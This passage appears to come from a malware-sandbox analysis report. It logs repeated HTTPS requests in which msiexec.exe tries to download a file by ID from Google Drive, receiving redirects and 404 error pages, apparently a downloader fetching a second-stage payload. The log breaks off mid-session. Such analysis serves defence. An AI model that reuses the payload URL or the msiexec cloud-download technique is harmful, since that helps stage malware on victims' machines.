                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:28 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 46 56 31 45 42 6a 67 74 57 48 52 41 31 79 62 49 4a 66 4e 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JFV1EBjgtWHRA1ybIJfNmA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.549854142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:28 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:29 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:29 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-34Ol2C95bJvhpHAE-qTjcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.549861142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:29 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:30 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC4CslTfWGSl5R8tG40IWjgAand3ceFpKh0lDsBSqbG9543qlG4KHcx4M-P1chlRHu10QoScpM4
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:30 GMT
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-KWbEQ_NwIL2BjakGt9R-dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:30 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 72 52 49 72 78 75 65 53 46 62 39 56 4d 47 47 47 6a 51 45 6e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="orRIrxueSFb9VMGGGjQEnQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.549869142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:31 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:31 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:31 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: script-src 'nonce-D99N1mlAllIL6QVUZh5kBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.549878142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:32 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:32 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgTpPkOOOetlQSgeS_zLn_7Foe9EO6Ec5ZYEOnttX3VT4reaoggVtYfmlTWBaryVh8Lx
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:32 GMT
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: script-src 'nonce-Zq5_Shla6RebxsIP5qjQ2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:32 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 76 4f 5a 45 72 74 70 77 71 51 7a 71 53 6c 74 53 52 6a 6e 63 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WvOZErtpwqQzqSltSRjncQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.549885142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:33 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:34 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:33 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-FDSMHMFVqPieBbs87ILLYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.549894142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:34 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:35 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgRqhlHxsyA8geqzfXTUgUHCP17lR0hKy7XNiY_PbxXWvumT3DF4KQmXm1D8IXYj9gSwO_TcMbM
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:35 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-qMKK1wLDB34wiWgmA9yTpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 55 31 50 41 33 34 76 4c 68 75 4f 44 55 4d 4c 5a 5f 54 69 69 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6U1PA34vLhuODUMLZ_Tiig">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.549900142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:35 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:36 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:36 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-Gs1wMYcs6_mt5EOQ7Bw7wg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.549906142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:37 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:37 UTC1844INHTTP/1.1 404 Not Found
